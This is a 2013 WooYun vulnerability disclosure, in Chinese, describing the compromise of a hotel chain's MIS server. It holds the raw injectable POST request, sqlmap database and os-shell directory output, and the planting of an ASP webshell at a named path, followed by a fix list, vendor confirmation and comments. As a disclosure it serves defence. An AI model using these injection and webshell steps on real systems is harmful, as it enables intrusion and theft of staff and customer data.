当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028138

漏洞标题:格林豪泰某重要站点一个越权引发的被沦陷血案

相关厂商:格林豪泰酒店管理集团

漏洞作者: 小胖子

提交时间:2013-07-08 09:52

修复时间:2013-08-22 09:53

公开时间:2013-08-22 09:53

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-08: 细节已通知厂商并且等待厂商处理中
2013-07-08: 厂商已经确认,细节仅向厂商公开
2013-07-18: 细节向核心白帽子及相关领域专家公开
2013-07-28: 细节向普通白帽子公开
2013-08-07: 细节向实习白帽子公开
2013-08-22: 细节向公众公开

简要描述:

看到你们在线,就速度提交一个。免房卡??

详细说明:

重要站点是:http://mis.998.com/ MIS系统
这个先不说,他关联了很多其他的系统。
首先,无意间找到了一个越权访问的地址。
http://mis.998.com/Portal/Workflow/Reports/QingXiaoJia.aspx
不需要登录就可以使用。还能查询很多你们的员工的请假信息。
然后抓包。

POST /Portal/Workflow/Reports/QingXiaoJia.aspx HTTP/1.1
Host: mis.998.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://mis.998.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://mis.998.com/Portal/Workflow/Reports/QingXiaoJia.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: Hm_lvt_0e4a2c65bdaddd66a53422d93daebe68=1373239720,1373240429,1373240442,1373240464; Hm_lpvt_0e4a2c65bdaddd66a53422d93daebe68=1373241387; LXB_REFER=998.com
__VIEWSTATE=%2FwEPDwUJODQ5MDA5ODY1ZGQ68LGgEAKwm2KxD8qjhtU7TpbyajGKplG2LRBv05Lm7w%3D%3D&TextBox_LiuChengZhuZhi=1&TextBox_LiShuBuMen=&TextBox_StartDate=2013-07-08&TextBox_EndDate=2013-07-08&DropDownList_QingJiaoLeiXing=%E4%B8%8D%E9%99%90&Button_Do=%E6%B1%87%E6%80%BB%E6%95%B0%E6%8D%AE


其中post的参数可以注入,还好,不是盲注,而且,是DBA权限。

DBA.jpg


其中的数据库哟,多得受不了。

available databases [14]:
[*] crs_interface
[*] distribution
[*] ERP
[*] ERPReport
[*] ERPSession
[*] H3
[*] master
[*] Mis
[*] model
[*] msdb
[*] PerfmonDB
[*] PersonnelOrganization
[*] RequireManage
[*] tempdb


当前的数据库是H3,但是ERP的数据也在这个里面?
貌似你们的会员密码是明文存储的,官网的找回密码功能就知道了。
然后,DBA下看目录,看了N久,没有charset,居然还有乱码返回,不管了。

os-shell> dir d:
do you want to retrieve the command standard output? [Y/n/a] y
[08:38:47] [INFO] the SQL query used returns 45 entries
[08:38:48] [INFO] retrieved:
[08:38:48] [INFO] retrieved:  ??????????????8 ??? ?7,098,409,422 ??
[08:38:48] [INFO] retrieved:  ??????????????8 ??? ?7,098,409,422 ??
[08:38:49] [INFO] retrieved:  ??????????????8 ??? ?7,098,409,422 ??
[08:38:49] [INFO] retrieved:  ?????????????29 ??? 15,383,695,360 ????
[08:38:49] [INFO] retrieved:  D:\\\\ ???
[08:38:49] [INFO] retrieved:  ?????? 7C5B-1FF5
[08:38:50] [INFO] retrieved:  ??? D ????????
[08:38:50] [INFO] retrieved: 2010-05-28 ?11:21 ???<DIR> ?????????80a5bca67d35ac6
92c
[08:38:50] [INFO] retrieved: 2010-06-07 ?10:43 ???<DIR> ?????????I386
[08:38:50] [INFO] retrieved: 2010-10-13 ?14:53 ???<DIR> ?????????OThinker
[08:38:51] [INFO] retrieved: 2010-12-17 ?10:36 ???<DIR> ?????????MisTest
[08:38:51] [INFO] retrieved: 2011-02-14 ?13:58 ???<DIR> ?????????Interface_Test
[08:38:51] [INFO] retrieved: 2011-04-14 ?09:32 ???<DIR> ?????????519DB
[08:38:51] [INFO] retrieved: 2011-09-21 ?04:18 ???<DIR> ?????????DBAccessEngine
[08:38:52] [INFO] retrieved: 2011-10-02 ?16:57 ???<DIR> ?????????SQL
[08:38:52] [INFO] retrieved: 2011-10-12 ?16:31 ????????????1,876 SynLog.txt
[08:38:52] [INFO] retrieved: 2011-10-21 ?14:15 ???<DIR> ?????????prepare
[08:38:52] [INFO] retrieved: 2011-11-08 ?16:40 ???<DIR> ??????????????
[08:38:53] [INFO] retrieved: 2011-11-10 ?10:47 ???<DIR> ?????????HotelCardTemp
[08:38:53] [INFO] retrieved: 2011-11-17 ?09:33 ???<DIR> ???????????
[08:38:53] [INFO] retrieved: 2011-11-21 ?18:05 ???<DIR> ?????????998_api_test
[08:38:53] [INFO] retrieved: 2011-12-09 ?11:12 ???<DIR> ?????????rp
[08:38:54] [INFO] retrieved: 2011-12-31 ?14:30 ???<DIR> ?????????Assess
[08:38:54] [INFO] retrieved: 2011-12-31 ?16:11 ??????890,670,592 h3
[08:38:54] [INFO] retrieved: 2012-01-01 ?13:55 ???<DIR> ?????????WoptiUtilities
[08:38:54] [INFO] retrieved: 2012-01-13 ?09:37 ???<DIR> ?????????public
[08:38:55] [INFO] retrieved: 2012-01-18 ?09:21 ????????????????0 ERPWindowServic
es.txt
[08:38:55] [INFO] retrieved: 2012-01-31 ?16:36 ???<DIR> ?????????H3 Webconfig
[08:38:55] [INFO] retrieved: 2012-02-20 ?18:39 ???<DIR> ?????????????
[08:38:56] [INFO] retrieved: 2012-03-23 ?10:35 ??????????????844 AreaInfo.xml
[08:38:56] [INFO] retrieved: 2012-03-23 ?10:35 ??????????162,455 HotelInfo.xml
[08:38:56] [INFO] retrieved: 2012-04-07 ?11:54 ???<DIR> ?????????Program Files
[08:38:57] [INFO] retrieved: 2012-08-24 ?16:56 ???<DIR> ?????????FTP
[08:38:57] [INFO] retrieved: 2012-10-09 ?09:45 ???<DIR> ?????????20121009_??????
[08:38:57] [INFO] retrieved: 2013-02-17 ?18:06 ???<DIR> ?????????ERP
[08:38:57] [INFO] retrieved: 2013-03-04 ?11:20 ???<DIR> ?????????998_DataInterfa
ce
[08:38:58] [INFO] retrieved: 2013-03-18 ?15:50 ???<DIR> ?????????FileUpTwo
[08:38:58] [INFO] retrieved: 2013-04-27 ?10:08 ????6,207,536,853 ERP.rar
[08:38:58] [INFO] retrieved: 2013-06-09 ?10:50 ???<DIR> ?????????GreenTreeInnSys
tem
[08:38:58] [INFO] retrieved: 2013-07-02 ?15:36 ???<DIR> ?????????ATFiles
[08:38:59] [INFO] retrieved: 2013-07-05 ?10:32 ????????????????0 FinanceCache.tx
t
[08:38:59] [INFO] retrieved: 2013-07-08 ?00:08 ???<DIR> ?????????ConWeb
[08:38:59] [INFO] retrieved: 2013-07-08 ?02:38 ???????????36,802 WindowsServerEr
rorLog.txt
[08:38:59] [INFO] retrieved: 2013-07-08 ?02:38 ???<DIR> ?????????Mis_Data
command standard output:
---
 ??????????????8 ??? ?7,098,409,422 ??
 ??????????????8 ??? ?7,098,409,422 ??
 ??????????????8 ??? ?7,098,409,422 ??
 ?????????????29 ??? 15,383,695,360 ????
 D:\ ???
 ?????? 7C5B-1FF5
 ??? D ????????
2010-05-28 ?11:21 ???<DIR> ?????????80a5bca67d35ac692c
2010-06-07 ?10:43 ???<DIR> ?????????I386
2010-10-13 ?14:53 ???<DIR> ?????????OThinker
2010-12-17 ?10:36 ???<DIR> ?????????MisTest
2011-02-14 ?13:58 ???<DIR> ?????????Interface_Test
2011-04-14 ?09:32 ???<DIR> ?????????519DB
2011-09-21 ?04:18 ???<DIR> ?????????DBAccessEngine
2011-10-02 ?16:57 ???<DIR> ?????????SQL
2011-10-12 ?16:31 ????????????1,876 SynLog.txt
2011-10-21 ?14:15 ???<DIR> ?????????prepare
2011-11-08 ?16:40 ???<DIR> ??????????????
2011-11-10 ?10:47 ???<DIR> ?????????HotelCardTemp
2011-11-17 ?09:33 ???<DIR> ???????????
2011-11-21 ?18:05 ???<DIR> ?????????998_api_test
2011-12-09 ?11:12 ???<DIR> ?????????rp
2011-12-31 ?14:30 ???<DIR> ?????????Assess
2011-12-31 ?16:11 ??????890,670,592 h3
2012-01-01 ?13:55 ???<DIR> ?????????WoptiUtilities
2012-01-13 ?09:37 ???<DIR> ?????????public
2012-01-18 ?09:21 ????????????????0 ERPWindowServices.txt
2012-01-31 ?16:36 ???<DIR> ?????????H3 Webconfig
2012-02-20 ?18:39 ???<DIR> ?????????????
2012-03-23 ?10:35 ??????????????844 AreaInfo.xml
2012-03-23 ?10:35 ??????????162,455 HotelInfo.xml
2012-04-07 ?11:54 ???<DIR> ?????????Program Files
2012-08-24 ?16:56 ???<DIR> ?????????FTP
2012-10-09 ?09:45 ???<DIR> ?????????20121009_??????
2013-02-17 ?18:06 ???<DIR> ?????????ERP
2013-03-04 ?11:20 ???<DIR> ?????????998_DataInterface
2013-03-18 ?15:50 ???<DIR> ?????????FileUpTwo
2013-04-27 ?10:08 ????6,207,536,853 ERP.rar
2013-06-09 ?10:50 ???<DIR> ?????????GreenTreeInnSystem
2013-07-02 ?15:36 ???<DIR> ?????????ATFiles
2013-07-05 ?10:32 ????????????????0 FinanceCache.txt
2013-07-08 ?00:08 ???<DIR> ?????????ConWeb
2013-07-08 ?02:38 ???????????36,802 WindowsServerErrorLog.txt
2013-07-08 ?02:38 ???<DIR> ?????????Mis_Data
---


D盘下看到这个,果断找到web目录 GreenTreeInnSystem\GreenTreeInn
然后写马儿。

aspx.jpg


aspx写进去了,但是访问被强制跳转,后来看了下,貌似是webconfig限制。
你们疏忽了,我写了个asp的文件。没有限制。
http://mis.998.com/GreenTreeInn/wooyun.asp

写马.jpg


然后菜刀看了一下,权限大得惊人啊。

漏洞证明:

.jpg


没动你们任何数据,请尽快修复。

修复方案:

0x1:越权访问什么的全部限制。
0x2:aspx的程序,我看了下你们几乎都是aspx的,何必开放asp的权限。
0x3:数据库权限太高了,降权吧。
0x4:求礼物,没有礼物的话,20rank不能少吧!!!

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-07-08 18:53

厂商回复:

感谢您对格林豪泰酒店管理集团的支持,我们会对此进行修复工作感谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-08 10:00 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    哟喂,俺也来几发...

  2. 2013-07-08 10:02 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @带馅儿馒头 哈哈,打炮啊,来几发~

  3. 2013-07-08 10:35 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @小胖子 都是酒店...

  4. 2013-07-08 10:38 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @leaf 约炮啊亲!最近不好容易钓到一妹纸啊

  5. 2013-07-08 10:45 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @小胖子 先撸2发,看他们大方不:)

  6. 2013-07-08 10:46 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @带馅儿馒头 我也还有存货啊~都是酒店的,我擦

  7. 2013-07-08 10:51 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @小胖子 擦,你开房开多了?

  8. 2013-07-08 11:15 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @带馅儿馒头 @leaf @小胖子 你们一群坏人,又在这里集结

  9. 2013-07-08 11:35 | superbing ( 普通白帽子 | Rank:174 漏洞数:29 | 常羡古时儿女怀,嘻戏千山好自在。)

    WooYun: 格林豪泰连锁酒店业务系统安全漏洞(绕过安全措施可致用户信息泄漏) 就同一个业务系统吧!下次乌云审核请别自作多情的改我的漏洞标题,我本来写的是某酒店的,审核我就不懂为啥你要改个格林豪泰。。导致格林豪泰被轮!好好反省下,之所以不写名字自然有我自己的道理!

  10. 2013-07-08 11:54 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @superbing 首先,我可以肯定不是同一个,第二,也不是看了你的标题再去的,别人也不一定是看到你这个再去的,导致格林被轮,说得好像什么什么什么似得,你不发那个漏洞,就他现在的现状早迟都是被轮~

  11. 2013-07-08 11:56 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @xsser @superbing @小胖子 胖子牛说的是,我们是检测,又没干什么坏事...说的wooyun把他们怎么样了是的,免费的渗透测试呀,可是,,,而且我们都是点到为止。。。

  12. 2013-07-08 12:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @superbing 看看乌云标准的漏洞标题啊 如果都写某企业某系统某漏洞 你看看会如何......

  13. 2013-07-08 14:19 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    @xsser 万人骑?

  14. 2013-07-08 14:54 | superbing ( 普通白帽子 | Rank:174 漏洞数:29 | 常羡古时儿女怀,嘻戏千山好自在。)

    好吧!你们就当我没说吧!从漏洞标题可以看出一个人的心境。首先我只是想冲下普通白帽子提早看下别人的漏洞才发了几个漏洞。其次作为白帽子貌似可以低调点吧!要那么响亮的标题做啥?求膜拜?得了吧!虚拟的网络膜拜个啥?有成就感啦?漏洞过程都差不多,手法都差不多,你要被膜拜天天发几个不就得了!反正目标随意!要刷分还不容易!低调!兄弟们!